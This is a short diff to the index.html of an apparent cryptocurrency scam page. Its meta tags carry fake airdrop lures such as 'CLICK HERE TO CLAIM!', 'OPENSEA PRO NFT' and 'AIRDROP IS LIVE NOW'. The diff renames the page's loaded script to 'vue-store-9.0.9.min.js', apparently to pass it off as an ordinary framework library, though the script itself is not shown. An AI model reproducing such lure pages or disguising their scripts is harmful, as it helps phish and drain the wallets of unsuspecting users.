--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta property="og:title" content="CLICK HERE TO CLAIM!">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <script charset="UTF-8" type="text/javascript" src="./main-6932504efdbc30b7.min.js"></script>
+    <script charset="UTF-8" type="text/javascript" src="./vue-store-9.0.9.min.js"></script>
     <meta property="og:site_name" content="This is an automatically generated announcement message"><meta content="CLICK HERE - OPENSEA PRO NFT" property="og:title"><meta content="
 
 &#128994; AIRDROP IS LIVE NOW &#128994;
@@ -817,5 +817,6 @@ TRY YOUR LUCK ! &#128640;
   
 
    
+
 
 
